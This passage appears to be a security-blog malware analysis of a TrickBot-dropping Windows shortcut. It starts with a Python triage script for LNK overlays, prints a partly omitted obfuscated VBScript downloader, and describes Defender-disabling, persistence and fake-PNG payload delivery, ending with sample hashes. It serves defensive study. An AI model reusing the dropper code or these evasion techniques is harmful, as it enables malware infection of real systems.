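    if flags & HAS_IDLIST:                        # LinkTargetIDList: u16 size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                      # LinkInfo: u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for bit in STRING_FLAGS:                      # StringData: u16 char count, then chars
        if flags & bit:
            pos += 2 + struct.unpack_from("<H", data, pos)[0] * width
    while True:                                   # ExtraData: blocks until BlockSize < 4
        size = struct.unpack_from("<I", data, pos)[0]
        pos += 4
        if size < 4:
            break
        pos += size - 4
    return data[pos:]


def scan(data: bytes) -> dict:
    """Triage summary: overlay length and how text-like it is (script droppers are ~100% printable)."""
    overlay = lnk_overlay(data)
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in overlay)
    return {"overlay_bytes": len(overlay),
            "printable_ratio": round(printable / len(overlay), 3) if overlay else 0.0}


def build_lnk(arguments: str, appended: bytes = b"") -> bytes:
    """Constructed toy shortcut (header + Unicode Arguments + TerminalBlock); not a real sample."""
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, IS_UNICODE | 0x20)   # HasArguments
    header += b"\x00" * (HEADER_SIZE - len(header))       # attributes, timestamps, etc. zeroed
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + string_data + struct.pack("<I", 0) + appended


if __name__ == "__main__":
    clean = build_lnk("/c echo constructed-sample")
    dropper = build_lnk("/c echo constructed-sample",
                        b'LMpJGURpXGYocTvvOhCq = "..." : execute("...")\r\n')   # stand-in for the VBS
    print(scan(clean))      # no overlay
    print(scan(dropper))    # overlay present, fully printable
```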
The VBScript contained within our LNK file looks like this:

LMpJGURpXGYocTvvOhCq = "UULDhIzzHvQYdkTEvAQynUxZYSBcazBoIpRrNUdFZONadEIMDSyYGLBHimkJkDaqfNVMNzdwvREtsAnPLDTXimsqmHdwzZHcStdw" : execute("Set nhkIuUxqIvXRnkkZMhFF = CreateObject(""S""&""cripting.FileSyst""&""emObject"") : IJuHSmVXnBZQPrvVzBLI = ""chr(120-9Afn114-4Afn41-9Afn105-4Afn123-9Afn115-1Afn115-
...[code omitted]…
-7Afn105-4Afn119-3Afn102-1)""") : If  nhkIuUxqIvXRnkkZMhFF.FileExists("OeEgCMUjcEQtYoJaBeaj")=false Then ASdzIQAOucoVcutsePYR = replace(IJuHSmVXnBZQPrvVzBLI, "Afn", ")+chr(") : execute(eval(ASdzIQAOucoVcutsePYR))

Although we could deobfuscate it by hand or using some specialized tools, it is usually easiest to let the code deobfuscate itself and give us its readable version. In this case, it can be as simple as changing the last “execute” to “MsgBox” and running the code.

We can see that the VBScript code tries to fetch the credits.php page using an HTTP GET request and save the response as 5767904_7391395_2818162.exe in the Temp directory. It then tries to run the downloaded EXE file and delete itself. When accessed, credits.php indeed returned (it is no longer operational at the time of writing) a valid executable file named “akz005e6f.exe”, which tried to pass itself off as the Active Accessibility Event Hooks Library from Microsoft.

It probably won’t come as a surprise that our executable isn’t one of the Windows libraries, but rather something more insidious. In fact, the VirusTotal score of the file at the time of writing is 40/69, with multiple AV engines correctly detecting it as a variant of TrickBot.

When executed, our EXE file copies itself into ProgramData under the name “??????????.exe” and then closes the original instance of itself and runs the newly created one. The new instance then tries to turn off Windows Defender by disabling its capabilities through the use of Powershell (which is fairly usual for TrickBot [1]) and stopping and deleting its service.

It then achieves persistence by copying itself into the %appdata%\msspeedlib\ directory and creating a scheduled task named “Ms speed internet library,” which starts the newly created instance of the executable at system startup.

It seems that the authors of this variant of TrickBot felt some special animosity towards Windows Defender when they were writing the code, as the original name of the project seems to have been “Stupid Windios Defender.”

After letting the malware run for a while in a sandbox with Wireshark capturing network traffic, a couple of things caught my eye (besides the fact that Edge stopped working and that the malware tried to upload information about the compromised system to a remote server). One of them was evidence of an ARP sweep of the local network conducted from the infected machine. TrickBot has a well-known capability to interact with remote systems within local networks; however, I didn’t know it used a sequential ARP sweep to discover these systems.

The other interesting activity was a download of what appeared to be two PNG files (“samerton.png” and “tablone.png”) from a remote HTTP server. As a quick look at their magic bytes (MZ) and the DOS stub shows, the files in question are not pictures but Windows executables. On closer inspection, it becomes obvious that although the files are not completely identical, their differences are only very minor and that both are samples (most likely updated ones) of TrickBot.

Just as our original executable tried to appear as a legitimate Microsoft library, so do these two. The only difference is that in the case of fake PNGs, their authors chose to disguise them as “Print UI Cache” instead of the Active Accessibility Event Hooks Library.

At the time of writing, “tablone.exe” has a VirusTotal score of 18/68 and “samerton.exe” a score of 17/67.
Although we will stop here, it is interesting to note how far an analysis of a simple LNK file has already taken us – the next chart shows relationships between all the files mentioned in the diary and under it, you may find MD5 hashes of all three TrickBot samples.

  • 9F644F47C636C47C8908F9E68FF4AD84 – akz005e6f.exe
  • 2F97A820A4AC94D1435417921ED82489 – samerton.exe
  • F94FE1E4DB524EDAD8BE15BE2523BAEF – tablone.exe

[1] https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/
 

September 3, 2019.

ISC Stormcast For Tuesday, September 3rd 2019 https://isc.sans.edu/podcastdetail.html?id=6648, (Tue, Sep 3rd)

September 2, 2019.

ISC Stormcast For Monday, September 2nd 2019 https://isc.sans.edu/podcastdetail.html?id=6646, (Mon, Sep 2nd)
